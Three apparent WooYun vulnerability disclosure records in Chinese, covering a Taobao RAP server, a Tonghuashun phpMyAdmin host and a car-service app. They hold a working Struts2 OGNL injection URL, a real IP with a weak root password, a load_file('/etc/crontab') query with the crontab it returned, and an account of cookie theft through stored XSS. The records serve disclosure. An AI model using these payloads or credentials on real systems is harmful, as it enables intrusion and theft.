漏洞详情披露状态： 2016-04-27： 细节已通知厂商并且等待厂商处理中2016-04-28： 厂商已经确认，细节仅向厂商公开2016-05-08： 细节向核心白帽子及相关领域专家公开2016-05-18： 细节向普通白帽子公开2016-05-28： 细节向实习白帽子公开2016-06-12： 细节向公众公开简要描述：神器友情测试详细说明： code 区域http://rap.taobao.org/account/all.action?method:[email protected]/* */@DEFAULT_MEMBER_ACCESS,%23w%3d%23context.get%28%23parameters.rpsobj[0]%29,%23w.getWriter%28%29.println%2888888888-1%29,%23w.getWriter%28%29.flush%28%29,%23w.getWriter%28%29.close%28%29,1?%23xx:%23request.toString&reqobj=com.opensymphony.xwork2.dispatcher.HttpServletRequest&rpsobj=com.opensymphony.xwork2.dispatcher.HttpServletResponse漏洞证明：  修复方案：升级版权声明：转载请注明来源 举起手来@乌云漏洞回应厂商回应：危害等级：中漏洞Rank：6确认时间：2016-04-28 17:46厂商回复：您好，问题已确认，业务属于开源项目，非集团核心业务；目前部署在外售的阿里云上，不在生产网。感谢您对阿里安全的关注和支持。最新状态：暂无

漏洞详情披露状态： 2016-04-28： 细节已通知厂商并且等待厂商处理中2016-04-28： 厂商已经确认，细节仅向厂商公开2016-05-08： 细节向核心白帽子及相关领域专家公开2016-05-18： 细节向普通白帽子公开2016-05-28： 细节向实习白帽子公开2016-06-12： 细节向公众公开简要描述：同花顺某phpMyAdmin存在root弱口令详细说明：http://183.131.12.139:81/phpmyadmin/root123456/hxapp/hqserver/ 同花顺行情服务器的标志漏洞证明：select load_file('/etc/crontab');code 区域SHELL=/bin/bash PATH=/sbin:/bin:/usr/sbin:/usr/bin MAILTO=root HOME=/ # For details see man 4 crontabs # Example of job definition: # .---------------- minute (0 - 59) # | .------------- hour (0 - 23) # | | .---------- day of month (1 - 31) # | | | .------- month (1 - 12) OR jan,feb,mar,apr ... # | | | | .---- day of week (0 - 6) (Sunday=0 or 7) OR sun,mon,tue,wed,thu,fri,sat # | | | | | # * * * * * user-name command to be executed */5 * * * * root ntpdate ntp1.nl.net >/dev/null 2>&1 */3 8-16 * * 1-5 root sh /home/netstat/update_link_relation.sh > /dev/nul */1 * * * * root sh /home/l2log/update_log.sh > /dev/nul */1 8-16 * * 1-5 root sh /usr/local/nagios/var/processLog_cp.sh > /dev/nul 00 17 * * * root sh /home/lossreport/loss_report.sh >/dev/null 2>&1 ##00 22 * * 1-5 root sh /home/arping/deal_arping_file.sh >/dev/null 2>&1 */1 * * * * root sh /home/netcheck/netcheck_log.sh >/dev/null 2>&1 ##*/1 8-15 * * 1-5 root sh /home/netinfo/fpinglog_check.sh > /dev/nul #* * * * * root flock -xn /usr/local/nagios/var/log_summary/log_summary.sh /usr/local/nagios/var/log_summary/log_summary.sh >> /tmp/a.txt 2>&1 #00 23 * * * root sh /usr/local/nagios/var/log_summary/nagioslog_backup/nagioslog_backup.sh > /dev/null 00 22 * * 1-5 root sh /home/switch_check/get_mac.sh > /dev/nul 25 17 * * 1-5 root sh /home/switch_check/get_mac.sh > /dev/nul 00 09 * * 1-5 root sh /home/switch_check/get_mac.sh > /dev/nul */5 22-23 * * 1-5 root sh /home/arping/arping.sh > /dev/nul #*/1 * * * 1-5 root sh /home/check_loss/check_loss.sh >/dev/null 2>&1 59 05 * * * root mv /usr/local/nagios/var/nagios.log /usr/local/nagios/var/log_summary/nagios.log.6am #*/1 * * * 1-5 root sh /home/add_realtime_task/add_realtime_task.sh >/dev/null 2>&1 ##59 23 * * 0-6 root sh /home/netcheck/netcheck_db_back.sh >/dev/null ##59 23 * * 0-6 root sh /home/netcheck/netstat_db_back.sh >/dev/null #45 08 * * * root cp /usr/local/nagios/var/nagios.log /usr/local/nagios/var/log_summary/nagios.log.am8045 ##* * * * * root flock -xn /tmp/1.lock sh /tmp/1.sh #*/5 * * * * root flock -xn /home/nagios/CheckNagios/SendMail_PollerError.sh sh /home/nagios/CheckNagios/SendMail_PollerError.sh * * * * * root /usr/local/nagios/var/log_summary/poller_log_filter.sh */5 * * * * root sh /home/nagios/CheckNagios/checkNagiosProcess.sh 00 */2 * * * root sh /home/nagios/CheckNagios/checkDebugFile.sh */5 * * * 1-5 root sh /home/realtime_check/update_realtime.sh >/dev/null 2>&1 */30 * * * * root sh /usr/local/nagios/libexec/check_poller_disk > /dev/null 00 05 * * * root sh /hxapp/hqserver/bin/Sf_Disk.sh >/dev/null 2>&1 修复方案： 版权声明：转载请注明来源 路人甲@乌云漏洞回应厂商回应：危害等级：中漏洞Rank：5确认时间：2016-04-28 15:35厂商回复：你好，漏洞已经确认，正在进行处理，谢谢。最新状态：暂无

漏洞详情披露状态： 2016-04-25： 细节已通知厂商并且等待厂商处理中2016-04-26： 厂商已经确认，细节仅向厂商公开2016-05-06： 细节向核心白帽子及相关领域专家公开2016-05-16： 细节向普通白帽子公开2016-05-26： 细节向实习白帽子公开2016-06-10： 细节向公众公开简要描述：【一键洗车】首单洗车1分钱不要，洗车不用愁！[1] 【车险直销】在线预约购买挑战价格底线，车险省心购！【优惠加油】98折加油，浙商卡充值最高还返100元！【违章查询】支持全国三百多个城市查询，对爱车了如指掌！【爱车估值】免费专业在线估值，买卖二手车更安心！【专业救援】最专业的救援团队24小时随时待命，让您出行无忧！【年检协办】用13年的线下服务经验提供最贴心的协办服务！【缤纷优惠】一分钱洗车券、道路救援券、年检协办券，应有尽有！【好礼大放送】车辆认证成功，即享千元大礼包！[1]详细说明：在 小马达达 APP反馈建议插入xss然后等cookie40万客户收款大量商铺提现总金额XX万信用卡申请发现权限不高我找了我的信息来做案例，如何来确认是28万用户漏洞证明：11修复方案：11版权声明：转载请注明来源 小龙@乌云漏洞回应厂商回应：危害等级：高漏洞Rank：20确认时间：2016-04-26 17:23厂商回复：感谢白帽的关注，漏洞源自最早的1分钱洗车平台，已经修复。最新状态：暂无